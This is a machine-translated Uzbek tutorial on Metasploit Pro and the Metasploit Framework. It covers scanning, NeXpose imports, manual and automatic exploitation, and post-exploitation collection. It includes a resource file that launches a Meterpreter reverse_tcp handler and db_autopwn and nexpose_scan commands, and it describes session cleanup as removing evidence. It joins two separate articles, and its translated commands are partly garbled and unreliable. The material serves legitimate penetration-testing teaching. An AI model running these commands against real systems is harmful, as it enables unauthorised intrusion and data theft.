Pro Console Metasploit Pro funksiyasini buyruq qatori interfeysi orqali ta'minlaydi va Metasploit Web UI ga muqobil bo'lib xizmat qiladi. Agar siz an'anaviy Metasploit Framework foydalanuvchisi bo'lsangiz, Pro Console sizga Msf konsoliga o'xshash narsani beradi.

Quyidagi vazifalarni bajarish uchun Pro Console-dan foydalanishingiz mumkin:

  • Loyihalarni yaratish va boshqarish.
  • Xostlarni skanerlash va ro'yxatga olish.
  • Ma'lumotlarni import va eksport qilish.
  • Modullarni sozlash va ishga tushirish.
  • Avtomatlashtirilgan ekspluatatsiyalarni ishga tushirish.
  • Xostlar haqidagi ma'lumotlarni ko'rish.
  • Amaldagi tizimlardan ma'lumotlarni yig'ish.

Pro konsoli orqali barcha vazifalarni bajara olmaysiz. Qo'llab-quvvatlanmaydigan vazifalar: hisobot berish, ijtimoiy muhandislik, Meta modullarini ishga tushirish, vazifalar zanjirini o'rnatish, shafqatsiz hujumni boshlash, veb-ilovalarni skanerlash.

Windows-da Pro Console-ni ishga tushirish

Windows-da konsolni ishga tushirish uchun Start > Metasploit > Metasploit Console-ni tanlang.

Bundan tashqari, konsolni buyruq satridan ishga tushirishingiz mumkin. Konsolni buyruq satridan ishga tushirish uchun quyidagilarni kiriting:

$cd/metasploit $console.bat

Linuxda Pro konsolini ishga tushirish

Linuxda konsolni ishga tushirish uchun quyidagi amallarni bajaring:

$ cd /opt/Metasploit/ $ sudo msfpro

Loyihalar sahifasi

Endi siz Metasploit-ning ba'zi asoslarini bilganingizdan so'ng, keling, Metasploit Pro-ni batafsil ko'rib chiqaylik. Metasploit Pro-ga kirganingizdan so'ng, ochiladigan birinchi ekran Loyihalar sahifasidir. Hozirda Metasploit Pro-da saqlangan barcha loyihalar. Shuningdek, siz mahsulotlar haqidagi yangiliklar va sehrgarlar va vositalarni ishga tushirishingiz mumkin.

Ilovada qayerda bo'lishingizdan qat'i nazar, siz tanlashingiz mumkin Loyihalar > Barcha loyihalarni ko'rsatish asboblar panelidan yoki sahifaga o'tish uchun Metasploit Pro logotipini bosing (pastga qarang):

Asboblar paneli

Asosiy asboblar paneli veb-interfeysning yuqori qismida joylashgan. Unga Metasploit Pro-ning istalgan joyidan kirish mumkin. Loyiha menyusiga, hisob sozlamalariga va administrator menyusiga kirish uchun asboblar panelidan foydalanishingiz mumkin.

Tez boshlash ustasi

Har bir Tez boshlash ustasi maqsadni skanerlash va undan foydalanish, ishlab chiqilgan ijtimoiy kampaniyalarni yaratish, veb-ilovalarni skanerlash va ulardan foydalanish hamda zaifliklarni sinab ko‘rish kabi kirish testi topshirig‘i bo‘yicha sizga yo‘l-yo‘riq ko‘rsatuvchi interfeys orqali ishlaydi.

Boshqariladigan interfeysni ishga tushirish uchun Tez ishga tushirish ustasi piktogrammalaridan birini bosishingiz mumkin.

Mahsulot yangiliklari

Ushbu bo'lim Rapid 7 haqidagi so'nggi yangiliklarni o'z ichiga oladi. Agar siz Rapid 7 va hamjamiyatning so'nggi modullaridan foydalanmoqchi bo'lsangiz, Mahsulot yangiliklari paneli so'nggi yangilanishlar haqida ko'proq ma'lumot olish uchun ajoyib joy.

Agar biron sababga ko'ra siz yangiliklar panelini ko'rishni istamasangiz, uni loyihalar sahifasida ko'rinmasligi uchun yashirishingiz mumkin.

Loyiha yaratish

Endi siz loyihalar sahifasi bilan tanishganingizdan so'ng, keling, loyiha yaratishga harakat qilaylik.

Loyiha ish maydoni va ma'lumotlarni saqlashni o'z ichiga oladi. Mantiqiy guruhlarda muloqot qilish mumkin. Tashkilotingizdagi turli quyi tarmoqlar uchun ko'pincha turli talablarga ega bo'lasiz, shuning uchun bu talablarni aks ettirish uchun bir nechta loyihalarga ega bo'lish ajoyib g'oyadir.

Masalan, kadrlar bo'limi uchun loyiha va IT bo'limi uchun boshqa loyiha yaratishingiz mumkin. Ushbu bo'limlarga bo'lgan talablaringiz juda boshqacha bo'lishi mumkin, shuning uchun maqsadlarni turli loyihalarga taqsimlash mantiqan to'g'ri keladi. Tashkilot bilan taqqoslash va xulosalaringizni baham ko'rish uchun har bir bo'lim uchun alohida hisobotlar yaratishingiz mumkin.

Loyihani yaratish juda oddiy. Siz tugmani bosishingiz mumkin Yangi loyiha loyihalar sahifasida yoki tanlang Loyiha > Yangi loyiha asosiy asboblar panelida.

Yangi loyihalar sahifasi paydo bo'lganda, faqat nom berishingiz kerak. Agar siz loyihani moslashtirmoqchi bo'lsangiz, tavsif qo'shishingiz, tarmoq diapazonini belgilashingiz, shuningdek, foydalanuvchi kirish darajasini belgilashingiz mumkin.

Loyihalar haqida ko'proq bilishni xohlaysizmi?

Mehmonlardan yashirin

.

Maqsadli ma'lumotlarni qabul qilish

Keyingi narsa loyihaga ma'lumotlarni qo'shishdir. Buning bir necha yo'li mavjud:

  • Batafsil skanerdan o'tkazing.
  • Sizda allaqachon mavjud ma'lumotlarni import qiling.
Maqsadlarni skanerlash

Skanerlash - bu tarmoqda ishlaydigan xizmatlarni ko'rish uchun xostlarni tekshirish va ochiq portlarni ro'yxatga olish jarayoni. Skanerlash faol tizimlarni xizmatlar bilan aniqlash imkonini beradi, ular orqali siz muloqot qilishingiz mumkin. Bu sizga samarali hujum rejasini ishlab chiqish imkonini beradi.

Metasploit o'zining o'rnatilgan, o'rnatilgan skaneriga ega bo'lib, u TCP portini skanerlash va maqsadli xostlar haqida qo'shimcha ma'lumot to'plash uchun Nmap-dan foydalanadi.

Odatiy bo'lib, tekshirish jarayoni UDP tekshiruvini o'z ichiga oladi, u UDP problarini NETBIOS, DHCP, DNS va SNMP kabi eng mashhur UDP portlariga yuboradi. Skanerlash odatda tashqi xizmatlar tomonidan ishlatiladigan taxminan 250 portni tekshiradi.

Skanerlash jarayonida Metasploit Pro avtomatik ravishda loyihadagi xost ma'lumotlarini saqlaydi. Tarmoq topologiyasini yaxshiroq tushunish va har bir maqsad uchun eng yaxshi foydalanishni aniqlash uchun xost ma'lumotlarini ko'rishingiz mumkin. Maqsad haqida qanchalik ko'p ma'lumot to'plasangiz, testni shunchalik aniqroq moslashtira olasiz.

Sinovni boshlash qiyin jarayon emas. Loyiha ichida tugmani bosing Skanerlash.

Yangi o'rnatilgan skanerlash shakli paydo bo'lganda, skanerlashni xohlagan xostlarni "" maydoniga kiriting. Maqsadli manzillar" Siz bitta IP-manzil, IP diapazoni yoki standart CIDR yozuvini kiritishingiz mumkin. Har bir element yangi qatorda paydo bo'lishi kerak.

Siz skanerlashni faqat bitta maqsad diapazoni bilan boshlashingiz mumkin. Biroq, agar siz skanerlashni batafsilroq sozlashni istasangiz, kengaytirilgan variantlardan foydalanishingiz mumkin. Misol uchun, siz skanerlashdan chiqarib tashlamoqchi bo'lgan xostlarni belgilashingiz va skanerlash tezligini o'rnatishingiz mumkin.

Batafsil skanerlash haqida ko'proq bilmoqchimisiz? ga boring

Mehmonlardan yashirin

.

Ma'lumotlarni import qilish

Agar zaiflik skaneridan foydalansangiz, zaiflik hisobotini Metasploit loyihasiga import qilishingiz mumkin. Import qilingan zaiflik ma'lumotlari qo'shimcha hujum yo'llarini aniqlash uchun tahlil qilinishi mumkin bo'lgan xost metama'lumotlarini ham o'z ichiga oladi. Metasploit Nessus, Qualys va Core Impact kabi bir nechta zaiflik skanerlarini qo'llab-quvvatlaydi.

Shuningdek, siz bir Metasploit loyihasidan boshqasiga ma'lumotlarni eksport qilishingiz va import qilishingiz mumkin. Bu sizga natijalarni loyihalar va boshqa jamoa a'zolari o'rtasida almashish imkonini beradi.

Loyihangizga maʼlumotlarni import qilish uchun “Import” tugmasini bosing.Maʼlumotlarni import qilish sahifasi paydo boʻlgach, NeXposeʼdan import yoki fayldan import qilishni tanlang. Siz tanlagan variantga qarab, forma faylni import qilish uchun sozlashingiz kerak bo'lgan variantlarni ko'rsatadi.

Misol uchun, agar siz NeXpose'dan import qilmoqchi bo'lsangiz, skanerlashni boshlash yoki saytni import qilish uchun foydalanmoqchi bo'lgan konsolni tanlashingiz kerak. Agar siz faylni import qilmoqchi bo'lsangiz, fayl joylashgan joyga o'tishingiz kerak.
Mavjud import turlarining toʻliq roʻyxatini koʻrish va import qilish haqida koʻproq maʼlumot olish uchun quyidagi sahifaga oʻting

Mehmonlardan yashirin

.

Xost maʼlumotlarini koʻrish va boshqarish

Xost ma'lumotlarini loyiha darajasida yoki xost darajasida ko'rishingiz mumkin. Loyiha darajasida Metasploit loyihaga qo'shilgan barcha xostlarning ko'rinishini taqdim etadi.

Loyiha darajasida ko'rishga kirish uchun ni tanlang Tahlil > Xostlar.

Loyiha darajasidagi ko'rinish dastlab har bir xost uchun portlar va xizmatlar soni bilan xostlar ro'yxatini ko'rsatadi. Shuningdek, siz loyiha uchun barcha yozuvlar, xizmatlar, zaifliklar va olingan ma'lumotlarni ko'rishingiz mumkin. Ularga kirish uchun ularning yorliqlarini bosing.

Xostning batafsil ma'lumotlarini ko'rish uchun Xost IP-manzili tugmasini bosishingiz kerak. Bu ma'lum bir xostning zaif tomonlari va hisob ma'lumotlarini ko'rishning yaxshi usuli.

Zaiflikni tekshirishni ishga tushiring

Loyihangizga maqsadli ma'lumotlarni qo'shgandan so'ng, foydalanish mumkin bo'lgan xavfsizlik kamchiliklarini aniqlash uchun zaifliklarni skanerdan o'tkazishingiz mumkin. Skanerlar maqsadli mashinalarda mavjud bo'lgan ma'lum zaifliklar va konfiguratsiya xatolarini tekshiradi. Ushbu ma'lumot hujumning mumkin bo'lgan yo'nalishlari va rejalarini aniqlashga yordam beradi.
NeXpose bilan integratsiya to'g'ridan-to'g'ri Metasploit veb-interfeysi orqali zaifliklarni skanerlash imkonini beradi. NeXpose skanerlash faol xizmatlarni, ochiq portlarni va har bir xostda ishlayotgan ilovalarni aniqlaydi; NeXpose ma'lum xizmatlar va ilovalar asosida mavjud bo'lishi mumkin bo'lgan zaifliklarni aniqlashga harakat qiladi.
NeXpose skanerlashni boshlash uchun tugmani bosing NeXpose vazifalar panelida joylashgan.

NeXpose sozlamalari shakli paydo bo'lganda, skanerlashni amalga oshirish uchun foydalanmoqchi bo'lgan konsolni sozlashingiz va tanlashingiz kerak. Shuningdek, skanerlash uchun xostlarni belgilashingiz va foydalanish uchun audit darajasini belgilovchi mavjud skanerlash shablonlaridan birini tanlashingiz kerak. Skanerlash naqshlari haqida ko'proq ma'lumot olish uchun qarang

Mehmonlardan yashirin

.

NeXpose tomonidan topilgan barcha mumkin bo'lgan zaifliklarni ko'rish uchun tanlang Tahlil > Zaifliklar. Siz zaiflik nomini bosishingiz va uni topish uchun ishlatilgan modullarni ko'rishingiz mumkin.

Muhim ma'lumot: operatsiya.

Zaiflik skanerlari xavfsizlikning mumkin bo'lgan kamchiliklarini tezda topishga yordam beradigan foydali vositalardir. Biroq, foydalanish mumkin bo'lgan zaifliklarni qo'lda aniqlash uchun siz FTP, SMB va VNC kabi ba'zi yordamchi modullarni ishga tushirishingiz mumkin. Zaiflikni qo'lda tahlil qilish ancha vaqt talab etadi va sizdan tanqidiy fikrlash hamda chuqur bilimni talab qiladi, ammo bu sizga aniq va samarali hujum rejasini yaratishga yordam beradi.

Zaifliklarni topish va ulardan foydalanishning oson usuli

Zaifliklarni skanerlash va tekshirishning eng oson usuli NeXpose va Metasploit Pro foydalanuvchilari uchun skanerlash jarayonini avtomatlashtiradigan skanerlash ustasi. Sehrgar sizga NeXpose maʼlumotlarini import qilishdan tortib, tekshirish natijalarini NeXpose’ga qaytarish uchun zaifliklardan avtomatik tarzda foydalanishgacha boʻlgan tekshirish jarayonida yoʻl-yoʻriq koʻrsatadigan, foydalanuvchilarga qulay interfeysni taqdim etadi.

Agar sizda NeXpose va/yoki Metasploit Pro-ga kirish imkoni bo'lmasa, tekshirish uchun zaiflikni qo'lda tahlil qilish talab qilinadi. Qo'lda skanerlash biroz ko'proq harakat talab qiladi, ammo zaifliklarni ancha yaxshi nazorat qiladi.
Zaifliklarni skanerlash haqida ko'proq ma'lumot olish uchun quyidagi manzilga o'ting

Mehmonlardan yashirin

.

Ma'lum zaifliklardan foydalanish

Maqsadlaringiz haqida ma'lumot to'plaganingizdan va potentsial zaifliklarni aniqlaganingizdan so'ng, siz ekspluatatsiya bosqichiga o'tishingiz mumkin. Ekspluatatsiya - bu aniqlangan zaifliklarga qarshi ekspluatatsiyalarni ishga tushirish jarayoni. Muvaffaqiyatli ekspluatatsiya maqsadli tizimlarga kirish imkonini beradi, shunda siz parol xeshlari va konfiguratsiya fayllarini olishingiz mumkin.

Metasploit ekspluatatsiya uchun ishlatilishi mumkin bo'lgan bir nechta turli usullarni taklif qiladi: avtomatik ekspluatatsiya va qo'lda ekspluatatsiya.

Avtomatik ishlash

Avtomatik ekspluatatsiya tegishli ekspluatatsiyalarni topish uchun o'zaro havolalar, ochiq xizmatlar, zaif havolalardan foydalanadi. Barcha ekspluatatsiyalar hujum rejasiga qo'shiladi, u ishga tushiriladigan ekspluatatsiyalarni belgilaydi. Avtomatlashtirilgan ekspluatatsiya xususiyati Metasploit maqsadli xostlar uchun mavjud bo'lgan ma'lumotlardan foydalanib, sessiyani iloji boricha tezroq tugatishdir.

Avtomatik ishlashni boshlash uchun tugmani bosing Ekspluatatsiya vazifalar panelida joylashgan.

Siz foydalanmoqchi bo'lgan xostlarni va har bir ekspluatatsiya uchun minimal ishonchlilikni ta'minlashingiz kerak. Ishlaydigan ekspluatatsiyalar xavfsiz bo'lishini ta'minlash uchun minimal ishonchlilik o'rnatilishi mumkin. Ishonchlilik darajasi qanchalik yuqori bo'lsa, zararli xizmatlar tomonidan ekspluatatsiyalardan foydalanish ehtimoli shunchalik kam bo'ladi. Har bir modul tavsifi uchun ushbu sahifaga o'ting.

Qo'lda ishlash

Qo'lda ekspluatatsiya zaifliklardan foydalanishga ko'proq yo'naltirilgan va uslubiy yondashuvni ta'minlaydi. Uning yordami bilan tanlangan ekspluatatsiyalarni birma-bir ishga tushirishingiz mumkin. Agar siz foydalanmoqchi bo'lgan ma'lum bir zaiflik mavjud bo'lsa, bu usul ayniqsa foydalidir.

Masalan, Windows XP da SMB serverida MS08-067 yamog'i yo'qligini bilsangiz, uni ishlatish uchun mos modulni ishga tushirishga urinib ko'rishingiz mumkin.

Modullarni qidirish uchun ni tanlang Modullar > Qidiruv va ishga tushirmoqchi bo'lgan modul nomini kiriting. Modulni topishning eng yaxshi usuli zaiflik havolasini qidirishdir. Misol uchun, agar siz 08-067 shakllarini qidirmoqchi bo'lsangiz, "ms08-067" ni qidirishingiz mumkin. Siz shuningdek modul yo'li bo'yicha qidirishingiz mumkin: exploit/windows/smb/ms08_067_netapi.

Zaiflik uchun ekspluatatsiyani topishning eng oson va qulay usullaridan biri to'g'ridan-to'g'ri zaifliklar sahifasida. Loyihadagi barcha zaifliklarni ko'rish uchun ni tanlang Tahlil > Zaifliklar. Siz zaiflik nomini bosishingiz va undan foydalanish uchun ishlatilishi mumkin bo'lgan bog'liq modullarni ko'rishingiz mumkin.

Alohida zaiflik turi xostga qarshi ishlatilishi mumkin bo'lgan ekspluatatsiyalar ro'yxatini ko'rsatadi. Siz tugmani bosishingiz mumkin Foydalanish modul sozlamalari sahifasini ochish uchun.

Umumiy modul sozlamalari

Har bir modul sizning ehtiyojlaringizga mos ravishda sozlanishi mumkin bo'lgan o'z imkoniyatlari to'plamiga ega. Imkoniyatlar shunchalik ko'pki, ularning barchasini bu erda sanab bo'lmaydi. Biroq, quyida modullarni sozlash uchun tez-tez ishlatiladigan bir nechta variant mavjud:

  • Foydali yuk turi: ekspluatatsiya maqsadli etkazib beradigan foydali yuk turini aniqlaydi. Quyidagi foydali yuk turlaridan birini tanlang:
  • Buyruq: Buyruqni bajaradigan foydali yuk. Bu masofaviy kompyuterda buyruqlarni bajarish uchun ishlatilishi mumkin.
  • Meterpreter: Buyruqlarni yetkazib berish va kengaytmalarni qo'llash mumkin bo'lgan buyruq qatorini ta'minlovchi progressiv foydali yuk.
  • Ulanish turi: Metasploit nishonga qanday ulanishini aniqlaydi. Quyidagi ulanish turlaridan birini tanlang:
  • Avtomatik: Agar NAT aniqlangan bo'lsa, avtomatik ulanish tegishli ulanishdan foydalanadi; aks holda, teskari aloqa ishlatiladi.
  • Bog'langan: zanjirli ulanish qo'llaniladi, bu maqsad xavfsizlik devori yoki NAT shlyuzida bo'lmasa, ayniqsa muhimdir.
  • Teskari: fikr-mulohazalardan foydalanadi, bu ayniqsa tizimingiz maqsadlar bilan ulanishni boshlay olmasa, juda muhimdir.
  • LHOST: Mahalliy xost manzilini belgilaydi.
  • LPORT: Loopbacklar uchun foydalanmoqchi bo'lgan portlarni belgilaydi.
  • RHOST: maqsad manzilni belgilaydi.
  • RPORT: Siz hujum qilmoqchi bo'lgan masofaviy portni belgilaydi.
  • Maqsad sozlamalari: Maqsadli operatsion tizim va versiyani belgilaydi.
  • Foydalanish vaqti tugashi: bir necha daqiqalik vaqt tugashini belgilaydi.
Operatsiyadan keyingi va ma'lumotlarni yig'ish

Ochiq seansda zaiflik natijalaridan muvaffaqiyatli foydalanadigan har qanday ekspluatatsiya siz maqsaddan ma'lumot olish uchun foydalanishingiz mumkin. Hujumning haqiqiy ta'siri maqsaddan olishingiz mumkin bo'lgan ma'lumotlarga (masalan, parol xeshlari, tizim fayllari) va qo'shimcha tizimlarga kirish uchun ushbu ma'lumotlardan qanday foydalanishingizga bog'liq.
Ochiq seanslar ro'yxatini ko'rish uchun yorliqni tanlang Seanslar (Seanslar). Xostga qarshi ishga tushirilishi mumkin bo'lgan ekspluatatsiyadan keyingi vazifalarni ko'rish uchun seans identifikatorini bosing.

Operatsion tizimdan ma'lumotlarni yig'ish uchun tugmani bosing Yig'ish.

Barcha ochiq sessiyalar ro'yxati to'planishi mumkin bo'lgan ma'lumotlar turini ko'rsatadi.

Tozalash seanslari

Ochiq seansni tugatsangiz, tizimdan chiqishdan oldin uni tozalashingiz mumkin. Bu tizimda qolishi mumkin bo'lgan barcha dalillarni olib tashlaydi. Seansni tozalash uchun bu yerga o'ting Seanslar va tugmani bosing Tozalash (Toza).

Aniq seans sahifasi paydo bo'lganda, yopmoqchi bo'lgan seanslarni tanlang, so'ngra tugmani bosing Tozalash
Seanslar
.

Hisobot yarating

Penetratsiya testi oxirida siz hisobot yaratishingiz mumkin. Metasploit test natijalarini kompilyatsiya qilish va ma'lumotlarni birlashtirish uchun ishlatilishi mumkin bo'lgan bir necha turdagi hisobotlarni taqdim etadi. Har bir hisobot o'z natijalarini tegishli bo'limlarga ajratadi, statistik ma'lumotlar uchun diagrammalar va grafiklarni ko'rsatadi va asosiy topilmalarni umumlashtiradi.
Hisobotlar haqida ko'proq ma'lumot olish uchun quyidagi manzilga o'ting

Mehmonlardan yashirin

.

Qo'shimcha manbalar

Biz juda ko'p ma'lumotlarni o'rganib chiqdik. Agar siz ba'zi muammolarni batafsilroq o'rganmoqchi bo'lsangiz, iltimos, murojaat qiling

Mehmonlardan yashirin

.

Endi siz Metasploit Pro-da umumiy vazifalarni qanday bajarishni bilasiz, foydalanishingiz mumkin bo'lgan boshqa variantlarni ko'rib chiqing:

  • Vazifalarni avtomatlashtirishni xohlaysizmi? Zanjir muammolari bilan tanishing.
  • Qo'pol kuch hujumiga qiziqasizmi?

    Mehmonlardan yashirin

    .
  • Xavfsizlik haqida xabardorlik dasturini boshlashni xohlaysizmi?

    Mehmonlardan yashirin

    Ijtimoiy muhandislik kampaniyasini qanday qurish kerak.

  • Buyruqlar qatorini afzal ko'rasizmi?

    Mehmonlardan yashirin

    .
  • Ramkalarga qiziqasizmi?

    Mehmonlardan yashirin

    .

7 yil oldin tug'ilgan MSF keyinchalik ishchi ekspluatatsiyalarni yozish uchun oddiy ramkadan dastlab o'ziga xos "Shveytsariya pichog'i" ga aylandi va endi pentestlarni o'tkazish uchun butun bir ustaxonaga aylandi, shu jumladan barcha zarur narsalar - ma'lumot to'plashdan tortib, ilg'or usullargacha. ekspluatatsiyadan keyingi. MSF eng ko'p ishlatiladigan beshta vositadan biri ekanligi bejiz emas. Va yaxshi xabar shundaki, MSF o'sishda va rivojlanishda davom etmoqda! Va qaysi yo'nalishda - siz ushbu maqoladan bilib olasiz.

Dastlab, maqola MSF-da harakatlarni avtomatlashtirish imkoniyatlarini tavsiflashi kerak edi, ammo odamlarning ramka haqidagi bilimlarini tahlil qilgandan so'ng, uning ko'proq yoki kamroq rivojlangan o'rnatilgan imkoniyatlari haqida gapirishga qaror qilindi va ularni avtomatlashtirish yo'lda muhokama qilinadi. . Bu odamlar g'ildirakni qayta ixtiro qilmasliklari uchun :).

Aytgancha, bilim haqida. Ularning ko'pi yo'qligi ajablanarli emas, chunki Metasploit haqida hatto ingliz tilida ham to'liq maqolalar/kitoblar yo'q. Shunday qilib, asosiy ma'lumot manbalari xorijiy bloglar va shaxsiy tadqiqotlardir. Bundan tashqari, men Ruby oddiy narsa ekanligidan xursandman va siz boshqalarning misollaridan foydalanib, foydali narsalarni qilishingiz mumkin.
Lekin nuqtaga! Ta'riflangan hamma narsa so'nggi versiyaga tegishli - MSF 3.4.2.

GUI qaytdi!

Konsolni yoqtirmaydigan yoki MSF buyruqlari bilan ishlashga dangasa bo'lganlar uchun GTK-ga asoslangan GUI qobig'i mavjud. Aniqrog'i, u mavjud edi, chunki u 3.3 versiyasida tark etilgan. Adashmasam msfweb bilan ham xuddi shunday bo'lgan. Ya'ni, siz hali ham foydalanishingiz mumkin, lekin baribir barqarorlik bilan bog'liq muammolar bor edi, lekin bu erda ... eh!

Ammo maqola tayyorlanayotganda, yaxshi narsa yuz berdi - yangi gooey qobiq. U tashqarida ham, ichkarida ham o'zgargan. Aniqrog'i, u Java-da yozilgan, shuning uchun u o'zaro faoliyat platformadir va XMLRPC interfeysi orqali MSF bilan o'zaro ta'sir qiladi, ya'ni uni masofadan turib ishlatish mumkin.

Gui-ni ishga tushirish ikki bosqichda amalga oshiriladi: msfrpcd-ni ishga tushiring, unga msfgui orqali ulaning. Niks ostida, msfgui-ni ishga tushirgandan so'ng, siz shunchaki "yangi msfprcd boshlash" tugmasini bosishingiz mumkin.

Win versiyasi:

  1. Cygwin konsolini ishga tushiring
  2. CD / msf3
  3. msfrpcd -S -U foydalanuvchi nomi -P parol bu erda –S – SSL-ni o'chirib qo'yadi va login/o'tishni ixtiro qildi
  4. Ikki marta bosish yoki konsolda (cygwinda emas) %MSF%\msf3\data\gui-da saqlanadigan msfgui.jar-ni ishga tushiring: java –jar msfgui.jar

Msfgui-da biz login/pass, port, IP-ni kiritamiz va ulanamiz.

Hatto eski gui bilan solishtirganda ham nimadir etishmayapti. Masalan, konsolga kirish yoki jurnallarni ko'rish. Ammo siz ishlashingiz mumkin, ayniqsa plaginlar, modullar orqali tezda o'tish, boshqa birovning kompyuterida sörf qilish va hokazo.

Ma'lumotlar to'plami

MSF ma'lumotlarni saqlash va modullari o'rtasida almashish uchun ma'lumotlar bazasi bilan ishlashini bilishingiz kerak. Va bu yo'nalish faol rivojlanmoqda.

Yangi boshlanuvchilar uchun to'liq qo'llab-quvvatlanadigan yagona ma'lumotlar bazasi PostgreSQL hisoblanadi. SQLite unumdorligi/miqyosidagi muammolar tufayli tark etildi va MySQL bilan ham biror narsa muammosiz ketmadi. Umuman olganda, Postgres-ni o'rnatish muammoga olib kelmasligi kerak. O'zaro ta'sir qilish uchun haydovchi MSF ichiga o'rnatilgan.

Win: o'rnatish ostida, foydalanuvchi uchun o'tishni o'rnating - postgres va port.

pgAdmin orqali: mahalliy serverga ulaning, boshqa “Kirish roli” foydalanuvchisini yarating (msf_user), “Bazalar” (msf_db) da maʼlumotlar bazasini yarating. U erda siz SQL serverining o'zini "xavfsizroq" qilib sozlashingiz va hatto MSF jadvallarini ko'rib chiqishingiz mumkin.

msf> db_driver postgresql
msf> db_connect msf_user: [elektron pochta himoyalangan]:5432/msf_db

Endi db_create buyrug'i to'g'ridan-to'g'ri ishlamaydi, siz faqat mavjud ma'lumotlar bazasiga ulanishingiz mumkin va agar sizda tegishli huquqlar (postgres foydalanuvchisi kabi) bo'lsa, ma'lumotlar bazasi avtomatik ravishda yaratiladi. Aks holda, Postgres-da ma'lumotlar bazasini qo'lda yarating.

Lekin bu juda qo'rqinchli emas, chunki siz ish joylaridan foydalanishingiz mumkin. Bitta ma'lumotlar bazasi mavjud, jadvallar bir xil, ammo modullar faqat joriy maydonda ma'lumot almashadi/qo'shadilar. Agar sinab ko'rsangiz, db_workspace sizga yordam berishini tushunasiz.

Keling, buyruqlarni bir oz ko'rib chiqaylik:

  • db_service - modullar, o'rnatilgan nmap yoki uchinchi tomon dasturlaridan import qilingan portlar/xizmatlar haqidagi ma'lumotlarni ko'rsatadi. Shunga asoslanib, db_autopwn –p parametri bilan ishlaydi (port bo'yicha);
  • db_notes - Nmap-dan olingan OS versiyasi yoki WMap tomonidan olingan ba'zi "tafsilotlar" kabi "eslatmalar". Bu uyat, lekin db_autopwn ekspluatatsiyani tanlash uchun db_notes ga qaramayotganga o'xshaydi.
  • db_vulns - MSF modullari (WMap) tomonidan topilgan yoki Nessus (OpenVAS), Nexpose'dan import qilingan zaifliklar. Shunga asoslanib, db_autopwn –x parametri bilan ishlaydi (zaifliklar bo'yicha).

Masalan, nmap yordamida xostni skanerlaymiz va natijalar bizning ma'lumotlar bazamizga kiradi:

msf> db_nmap –PN –sV 192.168.0.101

MSF port skaneri modulining natijasi o'xshash bo'ladi va ma'lumotlar ham ma'lumotlar bazasida tugaydi. Ammo xizmatlarni aniqlash uchun siz boshqa modullardan foydalanishingiz kerak (skaner bo'limida oxirida "versiya" bo'lgan barcha aux modullari, masalan, skaner/imap/imap_verison).

msf> skaner/portscan/tcp-dan foydalaning
msf> RHOSTS 192.168.0.101 ni o'rnating
msf> PORTS 1-1000 ni o'rnating
msf> ishga tushirish -j

Oxirgi harakatlarni va MSF-dagi har qanday harakatlarni avtomatlashtirish uchun siz resurs fayllari deb ataladigan fayllardan foydalanishingiz mumkin. Asosan, bu MSF uchun buyruqlarning ketma-ket ro'yxatiga ega oddiy matnli fayllar. Misol uchun, teskari hisoblagich uchun "server" ni tezda ishga tushirish uchun resurs yarataylik. Buning uchun (metrevhandl.rc) faylga quyidagi buyruqlarni qo'ying:

exploit/multi/handler-dan foydalaning
PAYLOAD windows/meterpreter/reverse_tcp-ni o'rnating
LPORT 4444 ni o'rnating
LHOST 192.168.0.102 ni o'rnating
ekspluatatsiya - j
orqaga

Biz skriptimizni “resurs” yordamida ishga tushiramiz:

msf> metrvhandl.rc resursi

Ko'rib turganingizdek, bu juda qulay. Lekin bu hammasi emas. Eng yaxshi tomoni shundaki, siz ushbu skriptlarda Ruby kodini yozishingiz mumkin, bu bizga, masalan, individual MSF modullari o'rtasida aloqalarni o'rnatish imkonini beradi.

Aytgancha, home/.msf3/msfconsole.rc - msfconsole ishga tushganda avtomatik ravishda ishga tushiriladigan skript. Masalan, ma'lumotlar bazasiga ulanishni surish juda qulay.

Qani ketdik...

WMAP. WMAP bu MSF-ni veb-ilovalar uchun moslashtirish va qandaydir tarzda hamma narsani avtomatlashtirishga urinishdir. WMAP loyihasi hali ham dastlabki bosqichda va ayniqsa raqobatchilarga nisbatan unchalik yaxshi ishlamayapti. Uning hech bo'lmaganda hozirgi ko'rinishida rivojlanishi dargumon va buning sababi shundaki, Rapid7 veb uchun mo'ljallangan ochiq manbali w3af ramkasini katta miqdorda moliyalashni boshladi, shuning uchun biz ichki qismlar yoki funksionallikning birlashishini kutishimiz mumkin. MSF va w3af. Ammo hali ham kichik bir misol (ma'lumotlar bazasiga ulanishni talab qiladi):

1. Wmap plaginini yuklang:

msf> db_wmap ni yuklang

2. Jabrlanuvchini qo'shish:

msf> wmap_targets -a http://www.example.com/

3. Bizning qurbonimizga qarshi modullarni ko'ring va ishga tushiring:

msf> wmap_run -t
msf> wmap_run –e

Natijalar ma'lumotlar bazasida saqlanadi va db_vulns, db_notes orqali mavjud.

Ba'zi modullar sozlamalarni sozlashni talab qiladi. Buni setg buyrug'i yordamida amalga oshirish mumkin. WMAP shuningdek, o'rgimchakka (wmap_crawler) va proksi-server (wmap_proxy) bilan ishlash qobiliyatiga ega.

Bundan tashqari, ma'lumotlar bazalarini har qanday in'ektsiya bilan qiynoqqa solishni yaxshi ko'radiganlar uchun men sizga MSF moduliga qarashni maslahat beraman - scanner/http/sqlmap. Bu xuddi shu nomdagi vosita porti - SQLmap. Gap, aytmoqchi, kuchli :). Asbob haqida ma'lumotni yaratuvchilarning veb-saytida topish mumkin -.

db_autopwn

MSF-dagi avtomatik chiqindilar bir nechta foydali parametrlarga ega bo'ldi:

  • -R – foydalaniladigan ekspluatatsiyaning minimal darajasini bildiradi;
  • -m - raftlarni tanlash uchun regexpni o'rnating.

Masalan:

msf> db_autopwn -t -p -m windows -R zo'r

standart Win xizmatlari uchun faqat eng yaxshi ekspluatatsiyalar ro'yxatini ko'rsatadi.

Aytgancha, 3.3.1 versiyasidan siz Nexpose bilan to'g'ridan-to'g'ri MFSdan ishlashingiz va aniqlangan zaifliklar asosida darhol avtomatik ravishda ishga tushirishingiz mumkin.

1. Plaginni yuklang va Nexpose-ga ulaning:

msf> keyingi yuklash
msf> nexpose_connect msf_user: [elektron pochta himoyalangan]

2. Biz topilgan zaifliklar uchun faqat eng yaxshi ekspluatatsiyalarni ishga tushiramiz:

msf> nexpose_scan -R ajoyib -x 192.168.0.101

Browser_autopwn

Agar avvalgi ekspluatatsiya standart ekspluatatsiyalar uchun mo'ljallangan bo'lsa, bu nomdan ko'rinib turibdiki, qurbonlar brauzerlariga qaratilgan mijoz ekspluatatsiyasi uchun mo'ljallangan.
